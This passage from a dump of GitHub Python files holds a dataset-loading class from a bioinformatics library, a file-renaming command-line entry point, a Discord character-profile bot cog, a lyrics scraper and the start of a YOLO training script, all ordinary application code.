'acquired_files' ]\n\n \n def __init__(self, where, download_where, redo=False, local_files=None):\n \"\"\"\n Initialize a DataObject object\n Parameters:\n -----------\n where: String. 
Where the final data should be stored\n download_where: String. Where the data should be downloaded\n redo: Boolean. Re-download the data, or not\n local_files: Dict: A dictionary of (name:path) for files\n add_property: Python class. If specified, objects will be added as properties to this class.\n \"\"\"\n \n self.where = where\n self.download_where = download_where\n self.redo = redo\n self.files = {}\n self.local_files = {}\n self.acquired_files = []\n self.registered = {}\n self.loaded = {}\n \n if local_files is not None:\n for lf_name, lf_path in local_files.items():\n self.local_files[lf_name] = utils.Acquire2(lf_path)\n self.files[lf_name] = self.local_files[lf_name]\n #efor\n #fi\n \n #edef\n \n def add_file(self, name, acquire_object, redo=None, finalize=True):\n \"\"\"\n Add a file acquire object.\n Parameters:\n -----------\n \n name: String. The name of the file\n acquire_object: biu.utils.Acquire2. The file acquisition pipeline\n redo: boolean. Set the redo status of this file, regardless of the total data object (Default is None)\n finalize: boolean|String\n if bool and true: at the end of the file acquisition, copy the file to \"self.where/name\".\n if string: at the end of the file acquisition, copy the file to \"self.where/finalize\".\n \n \"\"\"\n if name in self.local_files:\n utils.msg.dbm(\"The file '%s' has been specified by a localCopy, I will not add the new file specification.\" % name)\n else:\n redo = self.redo if redo is None else redo\n \n if not isinstance(acquire_object, utils.Acquire2):\n raise ValueError(\"Expected a biu.Acquire2 object.\")\n #fi\n \n acquire_object = acquire_object.set_redo(redo).set_where(self.download_where)\n \n if isinstance(finalize, str):\n acquire_object = acquire_object.finalize(\"%s/%s\" % (self.where, finalize))\n elif isinstance(finalize, bool) and finalize:\n acquire_object = acquire_object.finalize(\"%s/%s\" % (self.where, name))\n else:\n acquire_object = acquire_object.copy()\n #fi\n \n self.files[name] = acquire_object\n #fi\n #edef\n \n def get_file(self, name):\n \"\"\"\n Return the acquire file object.\n \"\"\"\n if name not in self.files:\n raise ValueError(\"No such file is known '%s'.\" % name)\n #fi\n return self.files[name]\n #edef\n \n def _acquire_files(self, files):\n \"\"\"\n Perform the acquisition pipeline for the files specified.\n parameters:\n -----------\n files: List of strings\n \"\"\"\n for f in files:\n if f in self.acquired_files:\n continue\n #fi\n\n self.files[f].acquire()\n #efor\n #edef\n \n def register(self, name, required_files, load_func):\n \"\"\"\n Register an object\n \n parameters:\n -----------\n name: String. python-identifier valid name of the object\n required_files: list. List of files (added by add_files) that need to exist before loading data\n load_func: Python function. Takes as input dictionary of paths. 
Must output some object\n docstring: String.\n \n NOTE: One or more of your arguments will most likely be the file of one of your files.\n If you have not specified a finalized location of these files, you must pass a placeholder parameter using file_path(file_name) such as this:\n \n Example:\n --------\n \n file = biu.utils.Acquire2().curl('https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data')\n data_objs = DataObjects(where='./', redo=False)\n data_objs.add_file(\"iris.tsv\", file)\n data_objs.register(\"iris\", [\"iris.tsv\"],\n lambda x: pd.read_csv(x[\"iris.tsv\"], index_col=False, names=['a','b','c','d','class']),\n docstring=\"An Pandas DataFrame of the IRIS data\")\n \"\"\"\n if not name.isidentifier():\n raise ValueError(\"The name '%s' is not a valid object name. Must be a valid python identifier.\" % name)\n #fi\n \n if name in self.__slots__:\n raise ValueError(\"Sorry, '%s' is not a valid object name. It is already used by this class.\" % name)\n #fi\n \n for file in required_files:\n if file not in self.files:\n raise ValueError(\"No such file is known: '%s'.\" % file)\n #fi\n #efor\n \n if not hasattr(load_func, '__call__'):\n raise ValueError('The provided load_func is not callable.')\n #fi\n \n self.registered[name] = (load_func, required_files)\n \n getter = lambda x: self.get(name)\n setter = lambda x, value: self.set(name, value)\n prop = property(fget=getter, fset=setter)\n setattr(self.__class__, name, prop)\n #edef\n \n def load(self, name):\n \"\"\"\n Loads or re-loads an object\n \"\"\"\n if name not in self.registered:\n raise AttributeError(\"No such object is registered: '%s'.\" % name)\n #fi\n \n load_func, required_files = self.registered[name]\n self._acquire_files(required_files)\n \n self.loaded[name] = load_func({ file_name : self.files[file_name].path for file_name in required_files })\n #edef\n \n def isloaded(self, name):\n if name not in self.registered:\n raise NameError(\"No such object is registered: '%s'.\" % name)\n #fi\n return name in self.loaded\n #edef\n \n def get(self, name):\n \"\"\"\n Return an object. Load if not loaded. Raises ValueError if object is not known\n \"\"\"\n if name not in self.loaded:\n self.load(name)\n #fi\n \n return self.loaded[name]\n #edef\n \n def __getitem__(self, name):\n \"\"\"\n Return an object. Load if not loaded. 
Raises ValueError if object is not known\n \"\"\"\n return self.get(name)\n #edef\n \n def set(self, name, value):\n \"\"\"\n Change the value of a loaded object (Useful if you are doing data management within the dataset)\n \"\"\"\n if (name not in self.loaded) and (name not in self.registered):\n raise AttributeError(\"No such object is known: '%s'.\" % name)\n #fi\n self.loaded[name] = value\n #edef\n \n def __setitem__(self, name, value):\n \"\"\"\n Change the value of a loaded object (Useful if you are doing data management within the dataset)\n \"\"\"\n self.set(name, value)\n #edef\n\n def __contains__(self, name):\n \"\"\"\n Check if an object is registered.\n \"\"\"\n return name in self.registered\n #edef\n \n#eclass\n\n##############################################################\n\ndef Dataset2_test():\n \"\"\"\n A wrapper function that makes a new version of the Dataset2 class when it is run.\n \"\"\"\n \n class Dataset2_unique_class(Dataset2):\n def __init__(self, *pargs, **kwargs):\n super(Dataset2_unique_class, self).__init__(*pargs, **kwargs)\n #eclass\n \n return Dataset2_unique_class\n#edef\n\nclass Dataset2(object):\n \"\"\"\n A BIU Dataset Object (Version 2).\n Datasets consist of files and objects.\n The Dataset object manages the dynamic acquisition of files and the dynamic loading of files into objects.\n For example, the IRIS dataset consists of a csv file, which is loaded into a dataframe object.\n \n Datasets will also provide additional methods to specifically access the relevant dataset\n \"\"\"\n \n __slots__ = [ '__where', '__download_where', '__redo', '_obj', '_str_funcs' ]\n \n def __init__(self, dataset_identifier,\n where=None,\n download_where=None,\n redo=False, local_files=None):\n \"\"\"\n Initialize a Dataset object:\n Parameters:\n -----------\n dataset_identifier: String. A name for the dataset. Typically 'dataset_name/version'\n where: String. Where the final data should be stored\n download_where: String. Where the data should be downloaded\n redo: Boolean. Re-download the data, or not\n local_files: Dict: A dictionary of (name:path) for files\n \"\"\"\n \n where = where if where is not None else settings.getDataDir()\n download_where = download_where if download_where is not None else settings.getDownloadDir()\n \n class _data_class(DataObjects):\n def __init__(self, *pargs, **kwargs):\n super(_data_class, self).__init__(*pargs, **kwargs)\n #eclass\n \n for attr in object.__getattribute__(self, '__slots__'):\n object.__setattr__(self, attr, None)\n #efor\n \n where = os.path.abspath(os.path.expanduser(where) + '/' + dataset_identifier)\n download_where = os.path.abspath(os.path.expanduser(download_where))\n \n object.__setattr__(self, '__where', where)\n object.__setattr__(self, '__download_where', download_where)\n object.__setattr__(self, '__redo', redo)\n object.__setattr__(self, '_obj', _data_class(where, download_where, redo, local_files))\n object.__setattr__(self, '_str_funcs', [])\n #edef\n \n def _add_str_func(self, fun):\n \"\"\"\n Add a function that is evaluated and printed when a string representation is made.\n\n Parameters:\n -----------\n fun: Function. Dataset2 object -> string.\n e.g. 
lambda x: '\\n'.join(list(x._obj.files.keys()))\n \"\"\"\n \n if not hasattr(fun, '__call__'):\n raise ValueError(\"The item provided must be callable.\")\n #fi\n \n self._str_funcs.append(fun)\n #edef\n \n \n def __str__(self):\n \"\"\"\n Prepare a string representation of the class\n \"\"\"\n dstr = \"%s object\\n\" % self.__class__.__name__\n \n dstr += \"Where: %s\\n\" % object.__getattribute__(self, '__where')\n dstr += \"Downloaded data in: %s\\n\" % object.__getattribute__(self, '__download_where')\n dstr += \"Redo: %s\\n\" % str(object.__getattribute__(self, '__redo'))\n\n for f in self._str_funcs:\n fstr = f(self)\n if fstr is None:\n continue\n #fi\n for line in fstr.split('\\n'):\n dstr += ' ' + line + '\\n'\n #efor\n #efor\n\n dstr += ' Objects:\\n'\n for oname in self._obj.registered:\n if oname[0] == '_':\n continue\n #fi\n loaded = oname in self._obj.loaded\n dstr += ' * [%s] %s\\n' % (('X' if loaded else ' '), oname)\n #efor\n\n dstr += \" Files:\\n\"\n for what in self._obj.files:\n loc = self._obj.get_file(what).path\n if os.path.islink(loc):\n dstr += \" * [%s] %s : %s -> %s\\n\" % ('S' if self._obj.get_file(what).exists else ' ', what, loc, pathlib.Path(loc).resolve())\n else:\n dstr += \" * [%s] %s : %s\\n\" % ('X' if self._obj.get_file(what).exists else ' ', what, loc)\n #fi\n #efor\n return dstr\n #edef\n \n def __repr__(self):\n \"\"\"\n Prepare a string representation of the class\n \"\"\"\n return str(self)\n #edef\n \n def __getattr__(self, name):\n \"\"\"After regular attribute access, try looking up the name within the registered objects\n This allows simpler access to objects for interactive use.\n \"\"\"\n\n # Note: obj.x will always call obj.__getattribute__('x') prior to\n # calling obj.__getattr__('x').\n \n try:\n object.__getattribute__(self, name)\n except AttributeError:\n pass\n #etry\n \n return object.__getattribute__(self, '_obj')[name]\n\n #edef\n\n def __setattr__(self, name, value):\n \"\"\"After regular attribute access, try setting the name\n This allows simpler access to objects for interactive use.\n \"\"\"\n\n # first try regular attribute access via __getattribute__, so that\n # e.g. ``obj.x`` and ``obj.x = 4`` will always reference/modify\n # the same attribute.\n\n try:\n object.__getattribute__(self, name)\n return object.__setattr__(self, name, value)\n except AttributeError:\n pass\n #etry\n \n object.__getattribute__(self, '_obj')[name] = value\n #edef\n \n def __dir__(self):\n \"\"\"\n To allow tab-completion for the registered objects.\n \"\"\"\n return object.__dir__(self) + list(self._obj.registered.keys())\n #edef\n\n#eclass","repo_name":"thiesgehrmann/BIU","sub_path":"biu/structures/dataset2.py","file_name":"dataset2.py","file_ext":"py","file_size_in_byte":14461,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"3429108257","text":"import argparse\nimport sys\n\nfrom .. 
import Tree\nfrom ..cli import default_rename, glob, rename, root_folder, show_progress\n\n\ndef main() -> int:\n parser = argparse.ArgumentParser(description=\"Flatten your Slippi game files to a shared parent folder\")\n parser.add_argument(*root_folder[\"name_or_flags\"], **root_folder[\"kwargs\"])\n parser.add_argument(*glob[\"name_or_flags\"], **glob[\"kwargs\"])\n parser.add_argument(*show_progress[\"name_or_flags\"], **show_progress[\"kwargs\"])\n parser.add_argument(*default_rename[\"name_or_flags\"], **default_rename[\"kwargs\"])\n\n args = parser.parse_args()\n\n with Tree(args.root_folder, glob=args.glob, show_progress=args.show_progress) as tree:\n rename(tree, args)\n\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"dawsonbooth/treefrog","sub_path":"treefrog/rename/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41933736054","text":"import discord\nimport traceback\nimport time\n\nfrom .lt_logger import lt_logger\nfrom discord import app_commands\nfrom discord.ext import commands\n\n\nclass char(commands.GroupCog, group_name=\"char\"):\n def __init__(self, bot, lt_db, channel):\n self.bot = bot\n self.db = lt_db\n self.logger = lt_logger\n self.channel = channel\n\n def ctx_info(self, ctx):\n return ctx.channel.category.id, ctx.guild.id, ctx.message.author.id\n\n async def paginate_embeds(self, Guild, embeds, ownerList):\n # check len(ownerList)\n # if len(ownerList) > 6, iterate through first 6 owners:\n # if len(ownerList) < 6, iterate through all owners:\n\n if len(ownerList) > 6:\n newList = ownerList[:6]\n else:\n newList = ownerList\n embed = discord.Embed(\n description=f\"Character List for {Guild.name}\",\n title=f\"__**Character List by Owner**__\",\n color=0x202020,\n )\n\n for owner in newList:\n characterList = self.db.get_char_by_owner(Guild.id, owner)\n charList = \"\"\n for char in characterList:\n try:\n char[\"name\"]\n charList += f\"{char['name']}\\n\"\n except:\n continue\n\n if charList == \"\":\n continue\n\n try:\n owner_name = await Guild.fetch_member(owner)\n owner_name = owner_name.display_name\n embed.add_field(name=f\"{owner_name}\", value=charList.title())\n except:\n owner_name = await self.bot.fetch_user(owner)\n owner_name = owner_name.name\n embed.add_field(\n name=f\"{owner_name}\",\n value=\"**__[USER NO LONGER IN SERVER]__**\\n\\n\" + charList.title(),\n )\n\n embeds.append(embed)\n del ownerList[:6]\n if len(ownerList) > 0:\n await self.paginate_embeds(Guild, embeds, ownerList)\n\n @commands.group(case_insensitive=True)\n async def char(self, ctx):\n \"\"\"\n Use to display a character's profile, if one exists. 
All characters are saved on a per-guild basis.\n\n Can also be used to list a user's characters, either your own by using .char without a name, or someone else's by using .char @user.\n \"\"\"\n\n if ctx.invoked_subcommand is None:\n try:\n try:\n ctx.message.mentions[0]\n await self.display(ctx)\n\n except:\n\n if ctx.message.content.lower() == \".char\":\n await self.display(ctx)\n else:\n Name = ctx.message.content.lstrip(\" \")\n await self.display(ctx, Name)\n\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self,\n message,\n self.__class__.__name__,\n \"Character Profile\",\n ctx.message.author,\n )\n\n @char.command()\n async def chown(self, ctx, Name):\n Name = Name.lower()\n _, Guild, ID = self.ctx_info(ctx)\n ownerCheck = \"\"\n try:\n ownerCheck = self.db.char_owner(Guild, ID, Name)\n except:\n pass\n # await ctx.send(f\"I don't think {Name.title()} belongs to you!\")\n try:\n newOwner = ctx.message.mentions[0]\n except:\n return await ctx.send(\n \"You must @ a user in order to designate a new owner.\"\n )\n\n if ownerCheck == True:\n output = self.db.change_owner(Guild, Name, newOwner.id)\n else:\n output = f\"I don't think you own {Name.title()}. Make sure you're trying to change ownership of the correct character profile!\"\n\n await ctx.send(output)\n\n @char.command()\n async def add(self, ctx, *, Name):\n \"\"\"\n Register a user's character.\n \"\"\"\n try:\n _, Guild, _ = self.ctx_info(ctx)\n except:\n ID = ctx.author.id\n\n Guild = self.db.get_server_proxy(ID)\n\n try:\n ID = ctx.message.mentions[0].id\n except:\n ID = ctx.message.author.id\n\n Name = Name.lower()\n\n output = self.db.add_char(Guild, ID, Name)\n await ctx.send(output)\n\n @char.command()\n async def remove(self, ctx, *, Name):\n \"\"\"\n Remove a user's character from the guild.\n \"\"\"\n try:\n _, Guild, ID = self.ctx_info(ctx)\n except:\n ID = ctx.author.id\n Guild = self.db.get_server_proxy(ID)\n\n Name = Name.lower()\n\n ownerCheck = \"\"\n try:\n ownerCheck = self.db.char_owner(Guild, ID, Name)\n except:\n pass\n if ownerCheck == True:\n output = self.db.remove_char(Guild, ID, Name)\n await ctx.send(output)\n else:\n await ctx.send(f\"{Name.title()} doesn't belong to you, or doesn't exist.\")\n\n @char.command(aliases=[\"set\"])\n async def addfield(self, ctx, Name, field: str, *, value):\n \"\"\"\n Add a field to a character, or update a field to a new value.\n \"\"\"\n Name = Name.lower()\n try:\n _, Guild, ID = self.ctx_info(ctx)\n except:\n ID = ctx.author.id\n Guild = self.db.get_server_proxy(ID)\n\n ownerCheck = \"\"\n\n try:\n ownerCheck = self.db.char_owner(Guild, ID, Name)\n except:\n await ctx.send(f\"I don't think {Name.title()} belongs to you!\")\n if ownerCheck == True:\n\n if field == \"color\":\n\n self.db.set_field(Guild, ID, Name, field, value)\n await ctx.send(f\"{Name.title()}'s {field} value has been updated!\")\n elif field in {\"owner\", \"category\", \"public\", \"name\"}:\n await ctx.send(\n f\"This value, {field.capitalize()}, is used for behind-the-scenes things, and cannot be modified. 
Sorry for the inconvenience!\"\n )\n else:\n self.db.set_field(Guild, ID, Name, field, value)\n await ctx.send(f\"{Name.title()}'s {field} value has been updated!\")\n\n @char.command(aliases=[\"unset\"])\n async def removefield(self, ctx, Name, field):\n \"\"\"\n Remove a field from a character.\n \"\"\"\n Name = Name.lower()\n\n try:\n _, Guild, ID = self.ctx_info(ctx)\n except:\n ID = ctx.author.id\n Guild = self.db.get_server_proxy(ID)\n\n ownerCheck = \"\"\n\n try:\n ownerCheck = self.db.char_owner(Guild, ID, Name)\n except:\n pass\n try:\n if ownerCheck == True:\n if field == \"owner\" or field == \"name\":\n await ctx.send(\"Sorry, I can't let you do that.\")\n else:\n self.db.unset_field(Guild, ID, Name, field)\n await ctx.send(f\"{field} has been removed from {Name.title()}!\")\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self,\n message,\n self.__class__.__name__,\n \"Remove Field\",\n ctx.message.author,\n )\n\n @char.command(hidden=True)\n async def display(self, ctx, Name=None):\n \"\"\"\n Display information regarding a stored character, including all stored fields.\n \"\"\"\n\n def check(reaction, user):\n return reaction.message.id == msg.id and user == ctx.author\n\n async def reaction_reset(reaction, user):\n if reaction.message.id == msg.id and user == ctx.author:\n await msg.remove_reaction(reaction, user)\n\n try:\n _, Guild, ID = self.ctx_info(ctx)\n except:\n ID = ctx.author.id\n Guild = self.db.get_server_proxy(ID)\n\n try:\n user = ctx.message.mentions[0].id\n results = self.db.get_char_by_owner(Guild, user)\n except:\n if Name == None:\n try:\n user = ctx.message.author.id\n results = self.db.get_char_by_owner(Guild, user)\n\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self,\n message,\n self.__class__.__name__,\n \"char\",\n ctx.message.author,\n )\n else:\n Name = Name.lower()\n results = self.db.get_char(Guild, Name)\n\n Guild = self.bot.get_guild(Guild)\n embeds = []\n for output in results:\n\n try:\n output[\"name\"]\n except:\n continue\n try:\n if output[\"description\"] != \"\":\n description = output[\"description\"]\n else:\n description = \" \"\n except:\n description = \" \"\n embed = discord.Embed(\n title=\"__\" + output[\"name\"].title() + \"__\",\n description=description,\n color=int(str(output[\"color\"]), 16),\n )\n\n try:\n\n embed.set_footer(\n text=f\"Owned by: { await Guild.fetch_member(int(output['owner']))}\"\n )\n except:\n embed.set_footer(\n text=f\"Owned by: { await self.bot.fetch_user(output['owner'])} : USER NO LONGER IN SERVER\"\n )\n\n del (\n output[\"_id\"],\n output[\"owner\"],\n output[\"name\"],\n output[\"color\"],\n output[\"public\"],\n )\n keys = []\n vals = []\n\n for i in output.items():\n keys.append(i[0]), vals.append(i[1])\n\n for i in range(len(output)):\n if keys[i].lower() == \"image\":\n embed.set_image(url=vals[i])\n elif keys[i].lower() == \"token\":\n embed.set_thumbnail(url=vals[i])\n\n elif keys[i].lower() == \"description\":\n pass\n\n else:\n embed.add_field(name=str(keys[i]), value=str(vals[i]))\n\n try:\n if embed:\n embeds.append(embed)\n else:\n await ctx.send(f\"It looks like {Name} doesn't exist!\")\n except:\n message = str(traceback.format_exc())\n self.logger.error(\n self,\n message,\n self.__class__.__name__,\n \"Display\",\n ctx.message.author,\n )\n\n if len(embeds) == 1:\n msg = await ctx.send(embed=embeds[0])\n\n await msg.add_reaction(\"❌\")\n timeout = time.time() + 3600\n\n while True:\n if time.time() > timeout:\n await 
msg.clear_reactions()\n break\n try:\n reaction, _ = await self.bot.wait_for(\n \"reaction_add\", timeout=3600.0, check=check\n )\n if reaction.emoji == \"❌\":\n await msg.delete()\n break\n else:\n await reaction_reset(reaction, user)\n except:\n pass\n\n else:\n page = 0\n\n msg = await ctx.send(embed=embeds[page])\n\n await msg.add_reaction(\"⏪\")\n await msg.add_reaction(\"⬅️\")\n await msg.add_reaction(\"🟥\")\n await msg.add_reaction(\"➡️\")\n await msg.add_reaction(\"⏩\")\n await msg.add_reaction(\"❌\")\n timeout = time.time() + 3600\n\n while True:\n if time.time() > timeout:\n await msg.clear_reactions()\n break\n try:\n reaction, _ = await self.bot.wait_for(\n \"reaction_add\", timeout=3600.0, check=check\n )\n if reaction.emoji == \"⬅️\" and page > 0:\n page -= 1\n await msg.edit(embed=embeds[page])\n await reaction_reset(reaction, ctx.author)\n elif reaction.emoji == \"➡️\" and page < len(embeds) - 1:\n page += 1\n await msg.edit(embed=embeds[page])\n await reaction_reset(reaction, ctx.author)\n elif reaction.emoji == \"⏪\" and page > 0:\n page = 0\n await msg.edit(embed=embeds[page])\n await reaction_reset(reaction, ctx.author)\n elif reaction.emoji == \"⏩\" and page < len(embeds) - 1:\n page = len(embeds) - 1\n await msg.edit(embed=embeds[page])\n await reaction_reset(reaction, ctx.author)\n elif reaction.emoji == \"🟥\":\n await msg.clear_reactions()\n break\n elif reaction.emoji == \"❌\":\n await msg.delete()\n break\n else:\n await reaction_reset(reaction, ctx.author)\n except:\n pass\n\n @char.command()\n async def webedit(self, ctx):\n \"\"\"\n Sends a link to the Little Thunder Web Editor.\n \"\"\"\n await ctx.send(\n \"The LT Web Editor can be found at https://webthunder.herokuapp.com/\"\n )\n\n @char.command()\n async def directory(self, ctx, detailLevel=\"Default\"):\n try:\n try:\n _, Guild, user = self.ctx_info(ctx)\n Guild = self.bot.get_guild(Guild)\n except:\n user = ctx.author.id\n Guild = await self.bot.fetch_guild(int(self.db.get_server_proxy(user)))\n\n # members = await Guild.fetch_members(limit=None).flatten()\n embeds = []\n\n def check(reaction, user):\n return reaction.message.id == msg.id and user == ctx.author\n\n async def reaction_reset(reaction, user):\n if reaction.message.id == msg.id and user == ctx.author:\n await msg.remove_reaction(reaction, user)\n\n async with ctx.typing():\n characters = list(self.db.get_all_char(Guild.id))\n characters = sorted(characters, key=lambda i: i[\"owner\"])\n\n owners = [character[\"owner\"] for character in characters]\n ownerList = []\n for owner in owners:\n if owner not in ownerList:\n ownerList.append(owner)\n\n if detailLevel.lower() == \"verbose\":\n for character in characters:\n\n try:\n character[\"name\"]\n except:\n continue\n try:\n if character[\"description\"] != \"\":\n description = character[\"description\"]\n else:\n description = \" \"\n except:\n description = \" \"\n embed = discord.Embed(\n title=\"__\" + character[\"name\"].title() + \"__\",\n description=description,\n color=int(str(character[\"color\"]), 16),\n )\n try:\n embed.set_footer(\n text=f\"Owned by: { await Guild.fetch_member(character['owner'])}\"\n )\n\n except:\n embed.set_footer(\n text=f\"Owned by: { await self.bot.fetch_user(character['owner'])} : USER NO LONGER IN SERVER\"\n )\n\n del (\n character[\"_id\"],\n character[\"owner\"],\n character[\"name\"],\n character[\"color\"],\n character[\"public\"],\n )\n keys = []\n vals = []\n\n for i in character.items():\n keys.append(i[0]), vals.append(i[1])\n\n for i in 
range(len(character)):\n if keys[i] == \"image\":\n embed.set_image(url=vals[i])\n elif keys[i] == \"token\":\n embed.set_thumbnail(url=vals[i])\n\n elif keys[i] == \"description\":\n pass\n\n else:\n embed.add_field(name=str(keys[i]), value=str(vals[i]))\n\n try:\n if embed:\n embeds.append(embed)\n else:\n pass\n except:\n message = str(traceback.format_exc())\n self.logger.error(\n self,\n message,\n self.__class__.__name__,\n \"Display\",\n ctx.message.author,\n )\n elif detailLevel.lower() == \"expanded\":\n new_embeds = await self.paginate_embeds(Guild, embeds, ownerList)\n\n else:\n\n for owner in ownerList:\n characterList = self.db.get_char_by_owner(Guild.id, owner)\n\n charList = \"\"\n for character in characterList:\n\n try:\n character[\"name\"]\n\n except:\n continue\n\n charList += str(character[\"name\"]).title() + \"\\n\"\n\n if charList != \"\":\n try:\n member = await Guild.fetch_member(owner)\n embed = discord.Embed(\n description=charList,\n title=member.display_name,\n color=member.color,\n )\n embed.set_thumbnail(url=member.avatar_url)\n embeds.append(embed)\n except:\n member = await self.bot.fetch_user(owner)\n embed = discord.Embed(\n description=charList,\n title=member.name,\n )\n embed.set_thumbnail(url=member.avatar_url)\n embed.set_footer(\n text=\"User may no longer be in this server.\"\n )\n embeds.append(embed)\n\n if len(embeds) == 1:\n msg = await ctx.send(embed=embeds[0])\n\n await msg.add_reaction(\"❌\")\n\n timeout = time.time() + 3600\n\n while True:\n if time.time() > timeout:\n await msg.clear_reactions()\n break\n try:\n reaction, _ = await self.bot.wait_for(\n \"reaction_add\", timeout=3600.0, check=check\n )\n if reaction.emoji == \"❌\":\n await msg.delete()\n break\n else:\n await reaction_reset(reaction, user)\n except:\n pass\n\n else:\n page = 0\n\n msg = await ctx.send(embed=embeds[page])\n\n await msg.add_reaction(\"⏪\")\n await msg.add_reaction(\"⬅️\")\n await msg.add_reaction(\"🟥\")\n await msg.add_reaction(\"➡️\")\n await msg.add_reaction(\"⏩\")\n await msg.add_reaction(\"❌\")\n timeout = time.time() + 3600\n\n while True:\n if time.time() > timeout:\n await msg.clear_reactions()\n break\n try:\n reaction, _ = await self.bot.wait_for(\n \"reaction_add\", timeout=3600.0, check=check\n )\n if reaction.emoji == \"⬅️\" and page > 0:\n page -= 1\n await msg.edit(embed=embeds[page])\n await reaction_reset(reaction, ctx.author)\n elif reaction.emoji == \"➡️\" and page < len(embeds) - 1:\n page += 1\n await msg.edit(embed=embeds[page])\n await reaction_reset(reaction, ctx.author)\n elif reaction.emoji == \"⏪\" and page > 0:\n page = 0\n await msg.edit(embed=embeds[page])\n await reaction_reset(reaction, ctx.author)\n elif reaction.emoji == \"⏩\" and page < len(embeds) - 1:\n page = len(embeds) - 1\n await msg.edit(embed=embeds[page])\n await reaction_reset(reaction, ctx.author)\n elif reaction.emoji == \"🟥\":\n await msg.clear_reactions()\n break\n elif reaction.emoji == \"❌\":\n await msg.delete()\n break\n else:\n await reaction_reset(reaction, ctx.author)\n except:\n pass\n\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self, message, self.__class__.__name__, \"Macro\", ctx.message.author\n )\n\n\ndef setup(bot):\n bot.add_cog(char(bot))\n","repo_name":"CaydenCailean/littlethunder","sub_path":"cogs/char.py","file_name":"char.py","file_ext":"py","file_size_in_byte":23130,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"37654432866","text":"#-*- 
coding: UTF-8 -*-\n'''\nScraper for https://www.lyricsify.com/\n'''\n\nimport requests\nimport re\nimport difflib\nfrom bs4 import BeautifulSoup\nfrom lib.utils import *\n\n__title__ = \"Lyricsify\"\n__priority__ = '130'\n__lrc__ = True\n\nUserAgent = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\"}\n\n\nclass LyricsFetcher:\n def __init__(self, *args, **kwargs):\n self.DEBUG = kwargs['debug']\n self.settings = kwargs['settings']\n self.SEARCH_URL = 'https://www.lyricsify.com/lyrics/%s/%s'\n self.LYRIC_URL = 'https://www.lyricsify.com%s'\n\n def get_lyrics(self, song):\n log(\"%s: searching lyrics for %s - %s\" % (__title__, song.artist, song.title), debug=self.DEBUG)\n lyrics = Lyrics(settings=self.settings)\n lyrics.song = song\n lyrics.source = __title__\n lyrics.lrc = __lrc__\n artist = song.artist.replace(' ', '-')\n title = song.title.replace(' ', '-')\n try:\n url = self.SEARCH_URL % (artist, title)\n search = requests.get(url, headers=UserAgent, timeout=10)\n response = search.text\n except:\n return None\n links = []\n soup = BeautifulSoup(response, 'html.parser')\n for link in soup.find_all('a'):\n if link.string and link.get('href').startswith('/lrc/'):\n foundartist = link.string.split(' - ', 1)[0]\n # some links don't have a proper 'artist - title' format\n try:\n foundsong = link.string.split(' - ', 1)[1].rstrip('.lrc')\n except:\n continue\n if (difflib.SequenceMatcher(None, artist.lower(), foundartist.lower()).ratio() > 0.8) and (difflib.SequenceMatcher(None, title.lower(), foundsong.lower()).ratio() > 0.8):\n links.append((foundartist + ' - ' + foundsong, self.LYRIC_URL % link.get('href'), foundartist, foundsong))\n if len(links) == 0:\n return None\n elif len(links) > 1:\n lyrics.list = links\n for link in links:\n lyr = self.get_lyrics_from_list(link)\n if lyr:\n lyrics.lyrics = lyr\n return lyrics\n return None\n\n def get_lyrics_from_list(self, link):\n title,url,artist,song = link\n try:\n log('%s: search url: %s' % (__title__, url), debug=self.DEBUG)\n search = requests.get(url, headers=UserAgent, timeout=10)\n response = search.text\n except:\n return None\n matchcode = re.search('/h3>(.*?)', '', lyricscode)\n return cleanlyrics\n","repo_name":"nebulous42069/diggz","sub_path":"nexus/script.cu.lrclyrics/lib/culrcscrapers/lyricsify/lyricsScraper.py","file_name":"lyricsScraper.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"42953125003","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport tensorflow as tf\ngpus = tf.config.experimental.list_physical_devices(device_type='GPU')\nfor gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\nimport numpy as np\nimport cv2\nfrom model.models import Darknet_body, DarknetTiny_body\nfrom model.loss import YoLoLoss\nfrom model.load_xml_data import load_data, preprocess_true_boxes\nimport os\n\n\n# In[2]:\n\ndef main():\n #input shape要為32的倍數,因為5次downsampling\n input_shape = (416, 416)\n annotation_path = 'annotation path'\n log_dir = 'save model path'\n classes_path = 'classes path'\n anchors_path = 'anchors path'\n class_name = get_classes(classes_path)\n #class數量\n num_classes = len(class_name)\n anchors = get_anchors(anchors_path) / input_shape[::-1]\n num_anchors = len(anchors)\n is_tiny_version = True\n batch_size = 40\n\n #creat model\n if is_tiny_version:\n model = DarknetTiny_body(input_shape, num_anchors, num_classes)\n 
